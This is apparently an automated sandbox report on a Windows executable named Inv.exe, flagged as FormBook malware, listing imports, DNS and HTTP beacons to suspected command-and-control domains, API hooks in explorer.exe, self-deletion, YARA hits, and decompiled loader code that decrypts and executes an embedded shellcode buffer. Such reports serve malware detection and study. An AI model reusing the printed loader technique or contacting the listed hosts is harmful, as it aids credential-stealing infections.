KERNEL32.dll | RaiseException, ReadConsoleW, ReadFile, CreateFileW, WriteConsoleW, GetStringTypeW, LCMapStringEx, SetConsoleCursorPosition, LoadLibraryW, GetModuleHandleW, HeapReAlloc, HeapSize, OutputDebugStringW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, FlushFileBuffers, SetStdHandle, WideCharToMultiByte, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetProcessHeap, HeapAlloc, GetStdHandle, GetTickCount64, GetSystemTimeAsFileTime, QueryPerformanceCounter, GetModuleFileNameA, GetCurrentThreadId, SetLastError, GetCPInfo, GetOEMCP, GetACP, EncodePointer, DecodePointer, GetLastError, InterlockedDecrement, ExitProcess, GetModuleHandleExW, GetProcAddress, AreFileApisANSI, MultiByteToWideChar, GetLocalTime, GetCommandLineA, IsDebuggerPresent, IsProcessorFeaturePresent, EnterCriticalSection, LeaveCriticalSection, CloseHandle, HeapFree, InitializeCriticalSectionAndSpinCount, RtlUnwind, GetFileType, DeleteCriticalSection, InitOnceExecuteOnce, GetStartupInfoW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, GetCurrentProcess, TerminateProcess, WriteFile, GetModuleFileNameW, Sleep, LoadLibraryExW, InterlockedIncrement, IsValidCodePage, SetEndOfFile
msi.dll |
loadperf.dll | LoadPerfCounterTextStringsA, UnloadPerfCounterTextStringsW, UnloadPerfCounterTextStringsA
MSVFW32.dll | StretchDIB
AVIFIL32.dll | AVIFileExit, AVIStreamReadData
pdh.dll | PdhEnumObjectsW, PdhSetQueryTimeRange, PdhGetDllVersion
WSOCK32.dll | WSASetBlockingHook, WSACancelAsyncRequest, bind, ord1104, ord1108, ord1130
GDI32.dll | StartDocW, GdiGetSpoolFileHandle, PolyBezier
MAPI32.dll |
MSACM32.dll | acmDriverPriority, acmFilterTagDetailsA

                                              Possible Origin

Language of compilation system | Country where language is spoken | Map
English | United States |

                                              Network Behavior

                                              Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
01/13/21-21:26:33.276386 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49759 | 34.102.136.180 | 192.168.2.4
01/13/21-21:28:17.122550 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49769 | 34.102.136.180 | 192.168.2.4

                                              Network Port Distribution

                                              TCP Packets


                                              UDP Packets


                                              DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jan 13, 2021 21:26:33.011740923 CET | 192.168.2.4 | 8.8.8.8 | 0xdb25 | Standard query (0) | www.millcityloam.com | A (IP address) | IN (0x0001)
Jan 13, 2021 21:26:53.489366055 CET | 192.168.2.4 | 8.8.8.8 | 0x5ae5 | Standard query (0) | www.jacmkt.com | A (IP address) | IN (0x0001)
Jan 13, 2021 21:27:14.754261017 CET | 192.168.2.4 | 8.8.8.8 | 0xbe02 | Standard query (0) | www.achonabu.com | A (IP address) | IN (0x0001)
Jan 13, 2021 21:27:35.661072016 CET | 192.168.2.4 | 8.8.8.8 | 0x117b | Standard query (0) | www.zhaowulu.com | A (IP address) | IN (0x0001)
Jan 13, 2021 21:27:56.201952934 CET | 192.168.2.4 | 8.8.8.8 | 0x5b2a | Standard query (0) | www.a-zsolutionsllc.com | A (IP address) | IN (0x0001)
Jan 13, 2021 21:28:16.858023882 CET | 192.168.2.4 | 8.8.8.8 | 0xa49c | Standard query (0) | www.nationshiphop.com | A (IP address) | IN (0x0001)
Jan 13, 2021 21:28:39.854707003 CET | 192.168.2.4 | 8.8.8.8 | 0x733 | Standard query (0) | www.hwcailing.com | A (IP address) | IN (0x0001)

                                              DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jan 13, 2021 21:26:33.091243029 CET | 8.8.8.8 | 192.168.2.4 | 0xdb25 | No error (0) | www.millcityloam.com | millcityloam.com | | CNAME (Canonical name) | IN (0x0001)
Jan 13, 2021 21:26:33.091243029 CET | 8.8.8.8 | 192.168.2.4 | 0xdb25 | No error (0) | millcityloam.com | | 34.102.136.180 | A (IP address) | IN (0x0001)
Jan 13, 2021 21:26:53.588946104 CET | 8.8.8.8 | 192.168.2.4 | 0x5ae5 | Name error (3) | www.jacmkt.com | none | none | A (IP address) | IN (0x0001)
Jan 13, 2021 21:27:14.836515903 CET | 8.8.8.8 | 192.168.2.4 | 0xbe02 | No error (0) | www.achonabu.com | | 172.96.186.206 | A (IP address) | IN (0x0001)
Jan 13, 2021 21:27:56.261003017 CET | 8.8.8.8 | 192.168.2.4 | 0x5b2a | No error (0) | www.a-zsolutionsllc.com | parkingpage.namecheap.com | | CNAME (Canonical name) | IN (0x0001)
Jan 13, 2021 21:27:56.261003017 CET | 8.8.8.8 | 192.168.2.4 | 0x5b2a | No error (0) | parkingpage.namecheap.com | | 198.54.117.217 | A (IP address) | IN (0x0001)
Jan 13, 2021 21:27:56.261003017 CET | 8.8.8.8 | 192.168.2.4 | 0x5b2a | No error (0) | parkingpage.namecheap.com | | 198.54.117.215 | A (IP address) | IN (0x0001)
Jan 13, 2021 21:27:56.261003017 CET | 8.8.8.8 | 192.168.2.4 | 0x5b2a | No error (0) | parkingpage.namecheap.com | | 198.54.117.210 | A (IP address) | IN (0x0001)
Jan 13, 2021 21:27:56.261003017 CET | 8.8.8.8 | 192.168.2.4 | 0x5b2a | No error (0) | parkingpage.namecheap.com | | 198.54.117.211 | A (IP address) | IN (0x0001)
Jan 13, 2021 21:27:56.261003017 CET | 8.8.8.8 | 192.168.2.4 | 0x5b2a | No error (0) | parkingpage.namecheap.com | | 198.54.117.216 | A (IP address) | IN (0x0001)
Jan 13, 2021 21:27:56.261003017 CET | 8.8.8.8 | 192.168.2.4 | 0x5b2a | No error (0) | parkingpage.namecheap.com | | 198.54.117.212 | A (IP address) | IN (0x0001)
Jan 13, 2021 21:27:56.261003017 CET | 8.8.8.8 | 192.168.2.4 | 0x5b2a | No error (0) | parkingpage.namecheap.com | | 198.54.117.218 | A (IP address) | IN (0x0001)
Jan 13, 2021 21:28:16.932145119 CET | 8.8.8.8 | 192.168.2.4 | 0xa49c | No error (0) | www.nationshiphop.com | nationshiphop.com | | CNAME (Canonical name) | IN (0x0001)
Jan 13, 2021 21:28:16.932145119 CET | 8.8.8.8 | 192.168.2.4 | 0xa49c | No error (0) | nationshiphop.com | | 34.102.136.180 | A (IP address) | IN (0x0001)
Jan 13, 2021 21:28:40.007352114 CET | 8.8.8.8 | 192.168.2.4 | 0x733 | No error (0) | www.hwcailing.com | | 107.160.136.152 | A (IP address) | IN (0x0001)

                                              HTTP Request Dependency Graph

                                              • www.millcityloam.com
                                              • www.achonabu.com
                                              • www.a-zsolutionsllc.com
                                              • www.nationshiphop.com

                                              HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.4 | 49759 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jan 13, 2021 21:26:33.137989044 CET | 1103 | OUT | GET /hko6/?OHiLR=jJBpdVbhUrMh9TJP&k2JxoV=9ExSQ4NEk+xqeDwz7kz53SpWI5tzJaWW64EQQFdVNavty5IFfZu+ty07sGNE8SwhRq/4 HTTP/1.1
                                              Host: www.millcityloam.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
Jan 13, 2021 21:26:33.276386023 CET | 1105 | IN | HTTP/1.1 403 Forbidden
                                              Server: openresty
                                              Date: Wed, 13 Jan 2021 20:26:33 GMT
                                              Content-Type: text/html
                                              Content-Length: 275
                                              ETag: "5ffc838f-113"
                                              Via: 1.1 google
                                              Connection: close
                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.4 | 49767 | 172.96.186.206 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Jan 13, 2021 21:27:14.964339018 CET | 4038 | OUT | GET /hko6/?OHiLR=jJBpdVbhUrMh9TJP&k2JxoV=Ds6mycG6XVC6cOnx6IQpHboGdSODTK5baT5OF1Gnzp/H9CBW+9tUucbuBNfXcxevyFer HTTP/1.1
                                              Host: www.achonabu.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              Jan 13, 2021 21:27:17.656807899 CET | 4039 | IN | HTTP/1.1 404 Not Found
                                              Connection: close
                                              X-Powered-By: PHP/5.6.40
                                              Content-Type: text/html; charset=UTF-8
                                              X-UA-Compatible: IE=edge
                                              Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                              Cache-Control: no-cache, must-revalidate, max-age=0
                                              Link: <https://abccarpetcare.com/wp-json/>; rel="https://api.w.org/"
                                              X-LiteSpeed-Cache-Control: public,max-age=3600
                                              X-LiteSpeed-Tag: 2cd_404,2cd_URL.8baa36f0385195f985698a5c3d8ac84b,2cd_ERR.404,2cd_
                                              X-Litespeed-Cache: miss
                                              Transfer-Encoding: chunked
                                              Date: Wed, 13 Jan 2021 20:27:17 GMT
                                              Server: LiteSpeed
                                              Data Ascii: 457d<!DOCTYPE html><html lang="en-US" ><head><meta charset="UTF-8" /><link rel="profile" href="http://gmpg.org/xfn/11"><link rel="pingback" href="http://abccarpetcare.com/xmlrpc.php"><title>Page not found &#8211; ABC Carpet Care &#8211; ABC Rug Cleaning NYC</title><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="generator" content="Total WordPress Theme 3.6.0" /><link rel='dns-prefetch' href='//abccarpetcare.com' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel='dns-prefetch' href='//s.w.org' /><link rel="alternate" type="application/rss+xml" title="ABC Carpet Care - ABC Rug Cleaning NYC &raquo; Feed" href="https://abccarpetcare.com/feed/" /><link rel="alternate" type="application/rss+xml" title="ABC Carpet Care - ABC R
                                              Jan 13, 2021 21:27:17.656835079 CET | 4040 | IN
                                              Data Ascii: ug Cleaning NYC &raquo; Comments Feed" href="https://abccarpetcare.com/comments/feed/" /><link rel='stylesheet' id='cnss_font_awesome_css-css' href='http://abccarpetcare.com/wp-content/plugins/easy-social-icons/css/font-awesome/css/all.min.c
                                              Jan 13, 2021 21:27:17.656851053 CET | 4042 | IN
                                              Data Ascii: ttp://abccarpetcare.com/wp-content/themes/Total/style.css?ver=3.6.0' type='text/css' media='all' /><link rel='stylesheet' id='wpex-google-font-open-sans-css' href='//fonts.googleapis.com/css?family=Open+Sans%3A100%2C200%2C300%2C400%2C500%2C6
                                              Jan 13, 2021 21:27:17.656866074 CET | 4043 | IN
                                              Data Ascii: s?ver=3.6.0' type='text/css' media='all' />...n2css--><script type='text/javascript' src='http://abccarpetcare.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script><script type='text/javascript' src='http://abccarpetcare.com/wp-includes
                                              Jan 13, 2021 21:27:17.656888962 CET | 4045 | IN
                                              Data Ascii: .water-damage .wpb_single_image img { height: auto; max-width: 70% !important; vertical-align: top;}.water-damage .vc_column-inner.wpex-clr { padding: 0;}.water-damage .vc_custom_1547070578374 { background-
                                              Jan 13, 2021 21:27:17.656908989 CET | 4046 | IN
                                              Data Ascii: responsive_css">/*-----CSS FROM PLUGIN-----*/div#mobile { display: none; }/*-----CUSTOM CSS ENDS HERE-----*//*Responsive css starts here*//*-----START OF BREAKPOINT-----*/@media only screen and (min-width: 1080px){}/*-----END OF BREAKPOINT----
                                              Jan 13, 2021 21:27:17.656928062 CET | 4047 | IN
                                              Data Ascii: : 60% !important; } div#mobile { display: block !important; }}/*-----END OF BREAKPOINT-----*/</style><style type="text/css" data-type="wpex-css">/*TYPOGRAPHY*/body{font-family:"Open Sans"}/*CUSTOMIZER STYLING*/#top-bar-wrap{border-color:#fffff
                                              Jan 13, 2021 21:27:17.656944990 CET | 4049 | IN
                                              Data Ascii: s-content top-bar-centered">917-747-4485 / 212-410-7700</div>... #top-bar-content --></div>... #top-bar --></div>... #top-bar-wrap --><header id="site-header" class="header-three wpex-full-width wpex-reposition-c
                                              Jan 13, 2021 21:27:17.656961918 CET | 4050 | IN
                                              Data Ascii: s="dropdown-menu sf-menu"><li id="menu-item-167" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home menu-item-167"><a href="https://abccarpetcare.com/"><span class="link-inner">Home</span></a></li><li id="menu-item
                                              Jan 13, 2021 21:27:17.656975031 CET | 4051 | IN
                                              Data Ascii: r" itemprop="headline"><span>404: Page Not Found</span></h1><nav class="site-breadcrumbs wpex-clr position-absolute has-js-fix"><span class="breadcrumb-trail"><span itemscope itemtype="http://data-vocabulary.org/Breadcrumb" class="trail-begin"


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              2 | 192.168.2.4 | 49768 | 198.54.117.217 | 80 | C:\Windows\explorer.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              Jan 13, 2021 21:27:56.454940081 CET | 4054 | OUT | GET /hko6/?OHiLR=jJBpdVbhUrMh9TJP&k2JxoV=eHiVknBCI+BDKnmhqMCE00F5l7UznldHUBBF08pOLsPmMyvxBhFlr4jwGXO1VYCPd09p HTTP/1.1
                                              Host: www.a-zsolutionsllc.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                              3 | 192.168.2.4 | 49769 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
                                              Timestamp | kBytes transferred | Direction | Data
                                              Jan 13, 2021 21:28:16.982839108 CET | 4055 | OUT | GET /hko6/?k2JxoV=oEk1uwcTzyLRlLIEQvULAWzRIM6BrJQxm2nmuYWQkJ+zIoa1KldNyrAb+1j5GiVi4vc4&OHiLR=jJBpdVbhUrMh9TJP HTTP/1.1
                                              Host: www.nationshiphop.com
                                              Connection: close
                                              Data Raw: 00 00 00 00 00 00 00
                                              Data Ascii:
                                              Jan 13, 2021 21:28:17.122550011 CET | 4055 | IN | HTTP/1.1 403 Forbidden
                                              Server: openresty
                                              Date: Wed, 13 Jan 2021 20:28:17 GMT
                                              Content-Type: text/html
                                              Content-Length: 275
                                              ETag: "5ffc838f-113"
                                              Via: 1.1 google
                                              Connection: close
                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                              Code Manipulations

                                              User Modules

                                              Hook Summary

                                              Function Name | Hook Type | Active in Processes
                                              PeekMessageA | INLINE | explorer.exe
                                              PeekMessageW | INLINE | explorer.exe
                                              GetMessageW | INLINE | explorer.exe
                                              GetMessageA | INLINE | explorer.exe

                                              Processes

                                              Process: explorer.exe, Module: user32.dll
                                              Function Name | Hook Type | New Data
                                              PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x85 0x5E 0xE3
                                              PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x8D 0xDE 0xE3
                                              GetMessageW | INLINE | 0x48 0x8B 0xB8 0x8D 0xDE 0xE3
                                              GetMessageA | INLINE | 0x48 0x8B 0xB8 0x85 0x5E 0xE3

                                              System Behavior

                                              General

                                              Start time:21:25:31
                                              Start date:13/01/2021
                                              Path:C:\Users\user\Desktop\Inv.exe
                                              Wow64 process (32bit):true
                                              Commandline:'C:\Users\user\Desktop\Inv.exe'
                                              Imagebase:0x1230000
                                              File size:333824 bytes
                                              MD5 hash:A3ABA7D40DA6C8C86E4E8D035803F314
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.673713344.0000000000D90000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.673713344.0000000000D90000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.673713344.0000000000D90000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:low

                                              General

                                              Start time:21:25:34
                                              Start date:13/01/2021
                                              Path:C:\Users\user\Desktop\Inv.exe
                                              Wow64 process (32bit):true
                                              Commandline:'C:\Users\user\Desktop\Inv.exe'
                                              Imagebase:0x1230000
                                              File size:333824 bytes
                                              MD5 hash:A3ABA7D40DA6C8C86E4E8D035803F314
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.709447848.00000000013E0000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.709447848.00000000013E0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.709447848.00000000013E0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.709353232.0000000001200000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.709353232.0000000001200000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.709353232.0000000001200000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.709266055.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:low

                                              General

                                              Start time:21:25:37
                                              Start date:13/01/2021
                                              Path:C:\Windows\explorer.exe
                                              Wow64 process (32bit):false
                                              Commandline:
                                              Imagebase:0x7ff6fee60000
                                              File size:3933184 bytes
                                              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Start time:21:25:50
                                              Start date:13/01/2021
                                              Path:C:\Windows\SysWOW64\autofmt.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\SysWOW64\autofmt.exe
                                              Imagebase:0x1080000
                                              File size:831488 bytes
                                              MD5 hash:7FC345F685C2A58283872D851316ACC4
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate

                                              General

                                              Start time:21:25:50
                                              Start date:13/01/2021
                                              Path:C:\Windows\SysWOW64\NETSTAT.EXE
                                              Wow64 process (32bit):true
                                              Commandline:C:\Windows\SysWOW64\NETSTAT.EXE
                                              Imagebase:0x3f0000
                                              File size:32768 bytes
                                              MD5 hash:4E20FF629119A809BC0E7EE2D18A7FDB
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.1046926366.0000000002A40000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.1046926366.0000000002A40000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.1046926366.0000000002A40000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.1046222240.0000000000350000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.1046964776.0000000002A70000.00000004.00000001.sdmp, Author: Joe Security
                                              • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.1046964776.0000000002A70000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                              • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.1046964776.0000000002A70000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                              Reputation:moderate

                                              General

                                              Start time:21:25:54
                                              Start date:13/01/2021
                                              Path:C:\Windows\SysWOW64\cmd.exe
                                              Wow64 process (32bit):true
                                              Commandline:/c del 'C:\Users\user\Desktop\Inv.exe'
                                              Imagebase:0x11d0000
                                              File size:232960 bytes
                                              MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              General

                                              Start time:21:25:54
                                              Start date:13/01/2021
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff724c50000
                                              File size:625664 bytes
                                              MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Disassembly

                                              Code Analysis

                                                Executed Functions

                                                C-Code - Quality: 66%
                                                			E01231040(void* __ecx, void* __edi, void* __esi, void* __eflags, void* __fp0) {
                                                				signed int _v5;
                                                				signed int _v12;
                                                				struct HINSTANCE__* _v16;
                                                				intOrPtr _v20;
                                                				intOrPtr _v24;
                                                				intOrPtr _v28;
                                                				intOrPtr _v32;
                                                				intOrPtr _v36;
                                                				intOrPtr _v40;
                                                				intOrPtr _v44;
                                                				long _v48;
                                                				void* _v1048;
                                                				void* _v7712;
                                                				void* __ebp;
                                                				void* _t133;
                                                				void* _t134;
                                                				void* _t176;
                                                				void* _t177;
                                                				void* _t178;
                                                				void* _t179;
                                                				void* _t180;
                                                				void* _t184;
                                                
                                                				_t184 = __fp0;
                                                				_t177 = __esi;
                                                				_t176 = __edi;
                                                				_t134 = __ecx;
                                                				E01238770(0x1e1c);
                                                				_v16 = GetModuleHandleW(L"Kernel32.dll");
                                                				E01236B80(_t134); // executed
                                                				_v44 = E01236A70(_v16, 0xb616c5d9);
                                                				_v40 = E01236A70(_v16, 0xe0baa99);
                                                				_v32 = E01236A70(LoadLibraryW(L"User32.dll"), 0x23fdef72);
                                                				_v24 = E01236A70(LoadLibraryW(L"User32.dll"), 0x695c9378);
                                                				_v36 = E01236A70(_v16, 0x9347c911);
                                                				_v28 = _v36(0, L"IEUCIZEO", 0xa);
                                                				_v20 = _v40(0, _v28);
                                                				E01237AE0( &_v7712, _v20, 0x1a05);
                                                				_t180 = _t179 + 0xc;
                                                				_v12 = 0;
                                                				while(_v12 < 0x1a05) {
                                                					_v5 =  *((intOrPtr*)(_t178 + _v12 - 0x1e1c));
                                                					_v5 = _v5 & 0x000000ff ^ _v12;
                                                					_v5 =  !(_v5 & 0x000000ff);
                                                					_v5 = _v5 & 0x000000ff ^ 0x00000086;
                                                					_v5 = (_v5 & 0x000000ff) + 0x17;
                                                					_v5 = _v5 & 0x000000ff ^ _v12;
                                                					_v5 = (_v5 & 0x000000ff) + _v12;
                                                					_v5 = (_v5 & 0x000000ff) >> 0x00000003 | (_v5 & 0x000000ff) << 0x00000005;
                                                					_v5 =  ~(_v5 & 0x000000ff);
                                                					_v5 = (_v5 & 0x000000ff) - _v12;
                                                					_v5 =  !(_v5 & 0x000000ff);
                                                					_v5 = _v5 & 0x000000ff ^ _v12;
                                                					_v5 =  !(_v5 & 0x000000ff);
                                                					_v5 = (_v5 & 0x000000ff) - 0x4c;
                                                					_v5 =  !(_v5 & 0x000000ff);
                                                					_v5 = (_v5 & 0x000000ff) + 0x13;
                                                					_v5 = (_v5 & 0x000000ff) >> 0x00000003 | (_v5 & 0x000000ff) << 0x00000005;
                                                					_v5 = (_v5 & 0x000000ff) - _v12;
                                                					_v5 =  !(_v5 & 0x000000ff);
                                                					 *((char*)(_t178 + _v12 - 0x1e1c)) = _v5;
                                                					_v12 = _v12 + 1;
                                                				}
                                                				VirtualProtect( &_v7712, 0x1a05, 0x40,  &_v48);
                                                				GrayStringW(_v24(0), 0, 0,  &_v7712,  &_v1048, 0, 0, 0, 0);
                                                				E012321E0( &_v7712, _t176, _t177, __eflags);
                                                				while(1) {
                                                					E01231380(_t176, _t177, __eflags, 8, 9, 0x46, 0xd);
                                                					E012312B0(0xa, 0xb);
                                                					_push("Press A to Log in as ADMINISTRATOR or S to log in as STAFF\n\n\n\t\t\t\t\t");
                                                					E0123715C(_t133, _t176, _t177, __eflags);
                                                					_t180 = _t180 + 4;
                                                					__eflags = (_v5 & 0x000000ff) - 0x41;
                                                					if((_v5 & 0x000000ff) == 0x41) {
                                                						break;
                                                					}
                                                					__eflags = (_v5 & 0x000000ff) - 0x61;
                                                					if((_v5 & 0x000000ff) != 0x61) {
                                                						__eflags = (_v5 & 0x000000ff) - 0x53;
                                                						if((_v5 & 0x000000ff) == 0x53) {
                                                							L10:
                                                							E01233610(_t133, _t176, _t177, _t184);
                                                						} else {
                                                							__eflags = (_v5 & 0x000000ff) - 0x73;
                                                							if((_v5 & 0x000000ff) != 0x73) {
                                                								__eflags = (_v5 & 0x000000ff) - 0x1b;
                                                								if((_v5 & 0x000000ff) == 0x1b) {
                                                									E012377B1(0);
                                                								}
                                                								__eflags = 1;
                                                								if(1 != 0) {
                                                									continue;
                                                								}
                                                							} else {
                                                								goto L10;
                                                							}
                                                						}
                                                					} else {
                                                						break;
                                                					}
                                                					L14:
                                                					__eflags = 0;
                                                					return 0;
                                                				}
                                                				E012322F0(_t176, _t177, _t184);
                                                				goto L14;
                                                			}


                                                APIs
                                                • GetModuleHandleW.KERNEL32(Kernel32.dll,?,012389A2,01230000,00000000,00000000), ref: 01231052
                                                  • Part of subcall function 01236B80: GetProcessHeap.KERNEL32(00000001,17D78400,00000000,?,?,01231060,?,012389A2,01230000,00000000,00000000), ref: 01236B8C
                                                  • Part of subcall function 01236B80: RtlAllocateHeap.NTDLL(00000000,?,?,01231060,?,012389A2,01230000,00000000,00000000), ref: 01236B93
                                                  • Part of subcall function 01236B80: GetProcessHeap.KERNEL32(00000001,00000000,00000000,17D78400,?,?,01231060,?,012389A2,01230000,00000000,00000000), ref: 01236BCD
                                                  • Part of subcall function 01236B80: HeapAlloc.KERNEL32(00000000,?,?,01231060,?,012389A2,01230000,00000000,00000000), ref: 01236BD4
                                                • LoadLibraryW.KERNEL32(User32.dll,23FDEF72,?,0E0BAA99,?,B616C5D9,?,012389A2,01230000,00000000,00000000), ref: 0123108C
                                                • LoadLibraryW.KERNEL32(User32.dll,695C9378,00000000,?,012389A2,01230000,00000000,00000000), ref: 012310A5
                                                • _memmove.LIBCMT ref: 012310F0
                                                • VirtualProtect.KERNELBASE(?,00001A05,00000040,?), ref: 0123120B
                                                • GrayStringW.USER32(00000000), ref: 0123122E
                                                • _wprintf.LIBCMT ref: 01231251
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.673866677.0000000001231000.00000020.00020000.sdmp, Offset: 01230000, based on PE: true
                                                • Associated: 00000000.00000002.673860190.0000000001230000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.673884698.0000000001248000.00000002.00020000.sdmp
                                                • Associated: 00000000.00000002.673894054.000000000124F000.00000008.00020000.sdmp
                                                • Associated: 00000000.00000002.673900982.0000000001251000.00000004.00020000.sdmp
                                                • Associated: 00000000.00000002.673907309.0000000001255000.00000002.00020000.sdmp
                                                Similarity
                                                • API ID: Heap$LibraryLoadProcess$AllocAllocateGrayHandleModuleProtectStringVirtual_memmove_wprintf
                                                • String ID: IEUCIZEO$Kernel32.dll$Press A to Log in as ADMINISTRATOR or S to log in as STAFF$User32.dll$User32.dll
                                                • API String ID: 1383926253-1224953502
                                                • Opcode ID: f1cfb7da98e0fbe52f0e95d8b6ba0e414f76b35301000ca7434cbb7e7ed0b6dd
                                                • Instruction ID: 08afd9cc00af8b1cae2df22be8b0b0cae08a55812a14bfa0ec7aad7eb6c1d1d6
                                                • Opcode Fuzzy Hash: f1cfb7da98e0fbe52f0e95d8b6ba0e414f76b35301000ca7434cbb7e7ed0b6dd
                                                • Instruction Fuzzy Hash: 56719CB4D5C2E9BADF01DBF988507FDBFB45F9A201F0880C9E5D1B6282C675474A8B21
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 41%
                                                			E01236B80(void* __ecx) {
                                                				void* _v8;
                                                				void* _t5;
                                                				void* _t7;
                                                				void* _t14;
                                                
                                                				_t14 = __ecx;
                                                				_push(__ecx);
